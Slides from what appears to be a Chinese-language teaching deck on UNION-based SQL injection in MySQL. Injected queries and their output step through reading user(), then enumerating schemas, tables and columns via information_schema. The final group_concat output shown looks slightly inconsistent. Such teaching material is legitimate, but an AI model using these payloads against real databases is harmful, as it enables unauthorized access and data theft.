SQL
SELECT * FROM users WHERE id=1;
id username password
1 test test
2 admin 1234
3 yzu yz1234
4 itac itac
Slide 50
Slide 50 text
SQL
SELECT * FROM users WHERE id=1 UNION
SELECT 1,2,3;
id username password
1 test test
2 admin 1234
3 yzu yz1234
4 itac itac
1 2 3
Slide 51
Slide 51 text
SQL
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,2,3;
id username password
1 2 3
Slide 52
Slide 52 text
SQL
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,user(),3;
id username password
1 root@localhost 3
Slide 53
Slide 53 text
• information_schema
MySQL
Slide 54
Slide 54 text
• information_schema
• 存有資料庫的中繼資料
MySQL
Slide 55
Slide 55 text
• information_schema
• 存有資料庫的中繼資料
• Database Name
• Table Name
• Column Name
MySQL
Slide 56
Slide 56 text
• Database Name
• information_schema.schemata
• Table Name
• information_schema.tables
• Column Name
• information_schema.columns
MySQL
Slide 57
Slide 57 text
SQL
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,schema_name,3 FROM
information_schema.schemata;
id username password
1 login 3
Slide 58
Slide 58 text
SQL
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,table_name,3 FROM
information_schema.tables WHERE
table_schema='login';
id username password
1 users 3
Slide 59
Slide 59 text
SQL
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,column_name,3 FROM
information_schema.columns WHERE
table_name='users';
id username password
1 id 3
Slide 60
Slide 60 text
SQL
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,column_name,3 FROM
information_schema.columns WHERE
table_name='users' limit 1,1;
id username password
1 username 3
Slide 61
Slide 61 text
SQL
SELECT * FROM users WHERE id=-1 UNION
SELECT 1,group_concat(column_name),3 FROM
information_schema.columns WHERE
table_name='users';
id username password
1 id 3